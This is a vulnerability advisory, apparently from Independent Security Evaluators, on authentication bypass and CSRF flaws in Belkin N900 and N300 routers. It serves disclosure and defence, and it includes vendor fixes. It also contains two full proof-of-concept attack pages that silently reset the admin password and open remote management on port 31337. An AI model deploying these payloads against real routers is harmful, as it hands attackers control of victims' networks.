Taking over the Belkin N900 and N300

[return to summary]

  • The N900 and N300 can be trivially taken over by any adversary on the LAN or WLAN.
  • The N900 and N300 can be taken over by a remote adversary through CSRF attack.
  • If remote management is enabled (not the default), the N900 and N300 can be trivially taken over by a remote adversary.

Description

The Belkin N900 (F9K1104v1) and N300 (F7D7301v1) routers are susceptible to authentication bypass attacks. Any user with access to the web interface can execute administrative commands without providing a username or password. If remote management is enabled, this includes all users on the WAN. Administrators who have enabled remote management should disable it immediately.

Even if remote management is not enabled, the Belkin N900 and N300 routers are susceptible to several CSRF attacks, which allow an attacker to forge HTML forms and execute actions on behalf of a legitimate user. ISE created a proof of concept that when executed by any user on the (W)LAN side of these routers (including an attacker who may reside on the (W)LAN), changes the administrator credentials and enables remote management services.

Local Attack Requirements

  • An attacker must have access to a machine on the local network, either by physically connecting, or by compromising a machine on the local network through other means (e.g., via malware).

Remote Attack Requirements

  • Remote management must be enabled on the router.

or

  • A victim on the (W)LAN must be fooled in to performing an action (e.g., by clicking an attacker provided link), browse to a malicious or compromised site, or be the victim of a man-in-the-middle attack.

Details

All HTML forms present in the Belkin N900 and N300 are susceptible to Cross-Site Request Forgery.

The authentication bypass issue has been previously discovered and reported in other models of Belkin routers.

  • Vulnerable Firmware is 1.00.06 on the N300.
  • Vulnerable Firmware is 1.00.23 on the N900.
  • The Belkin web site lists an available firmware update (3.00.05) for the N300, but this update appears to contain a different model number in its file name and was rejected by the router when we attempted to update.
  • Other versions of the firmware were not tested.

Impact

A successful attack exploiting this vulnerability can give a remote adversary full control of the victim router.

Recommendations to the vendor

  • Cross-Site request forgery can be prevented by including an unpredictable token in each HTTP request submitted to the web server. At a minimum, these tokens should be unique to each user, but it is recommended that each HTML form delivered contain a unique token.
  • In addition to HTML form tokens, HTTP "referer" checking should be enabled.
  • Validate HTTP Basic Authentication Header for all HTTP requests.
  • Additional information for vendors regarding immediate and long term fixes for these issues can be found on our summary page here.

Recommendations to device administrators

  • (4/13/2013) There is not currently an available firmware upgrade that will remedy this vulnerability.
  • Take additional preventative measures and precautions by following the steps outlined on our summary page here.

Proof of Concept

In the following proof of concept attacks, we assume that our adversary is on the (W)LAN, remote management has been enabled, or a user on the (W)LAN has browsed to a malicious web page. In either case, since HTTP Basic Authentication is not checked as part of the Belkin's processing of requests, the attacker can directly submit, or submit on behalf of a user via Javascript or CSRF, the attack payloads shown in Figures 1 and 2. These payloads set the administrator password to the one resulting in the included MD5 hash for the N900 or NULL for the N300, and enable remote management on port 31337.


<html>

<head>
<title>Belkin N900 CSRF - Change Admin Creds. and Enable Remote MGMT.</title>
<!--*Discovered by: Jacob Holcomb - 
	Security Analyst @ Independent Security Evaluators -->
</head>

<body>

<form name="belkinN900" action="http://192.168.2.1/util_system.html"
	method="post"/>
<input type="hidden" name="page" value="util_system"/>
<input type="hidden" name="sHr" value="00"/>
<input type="hidden" name="Mm" value="00"/>
<input type="hidden" name="eHr" value="00"/>
<input type="hidden" name="eMm" value="00"/>
<input type="hidden" name="RemoteIP" value="..."/>
<input type="hidden" name="passwd_md5" value="f370455a8a9c05e5f6ef92c67dc3c9f7"/> 
	<!--The password must be set as a MD5 hash value. -->
<input type="hidden" name="do_save_passwd_md5" value="1"/>
<input type="hidden" name="login_timeout" value="99"/> 
	<!-- Setting session timeout -->
<input type="hidden" name="EnableRgmt" value="1"/> 
	<!-- Enable Remote Management -->
<input type="hidden" name="checkremote" value="1"/>
<input type="hidden" name="http_wanport" value="31337"/> 
	<!-- Set the Remote Management Port -->
<input type="hidden" name="EnableUPNP" value="1"/>
<input type="hidden" name="version_eb" value="0"/> 
<!-- Enable UPnP -->
</form>

<script>
function BeLkIn() {document.belkinN900.submit();}; 
window.setTimeout(BeLkIn, 0000);
</script>

<body>
</html>

Figure 1. Attack page for N900.


<html>

<head>
<title>Belkin N300 CSRF - Change Admin Creds. and Enable Remote MGMT.</title>
<!--*Discovered by: Jacob Holcomb 
	- Security Analyst @ Independent Security Evaluators -->
</head>

<body>

<form name="belkinN300" action="http://192.168.2.1/apply.cgi" 
	method="post"/>
<input type="hidden" name="location_page" value="system.stm"/>
<input type="hidden" name="remote_mgmt_enabled" value="1"/>
<input type="hidden" name="http_passwd" value=""/> 
	<!--Chaning password to null -->
<input type="hidden" name="fw_disable" value="0"/> >
<input type="hidden" name="EnableRgmt" value="on"/> 
	<!-- Enable Remote Management -->
<input type="hidden" name="allow_remote_ip" value="0"/> 
	<!-- Setting session timeout -->
<input type="hidden" name="http_wanport" value="31337"/> 
	<!-- Set the Remote Management Port -->
<input type="hidden" name="arc_action" value="Apply+Changes"/>
</form>

<script>
function BeLkIn300() {document.belkinN300.submit();};
window.setTimeout(BeLkIn300, 0000);
</script>

<body>
</html>

Figure 2. Attack page for N300.

At this point, the attacker can remotely administer, and thereby remotely control the N900 or N300.

References

Credit

  • Discovered By: Jacob Holcomb – Security Analyst @ Independent Security Evaluators
  • Exploited By: Jacob Holcomb – Security Analyst @ Independent Security Evaluators

Contact Information

  • For more information on this particular Belkin hack, you can contact us at routers@www.ise.io
  • Alternatively, for more general information on ISE, you can reach us using contact@www.ise.io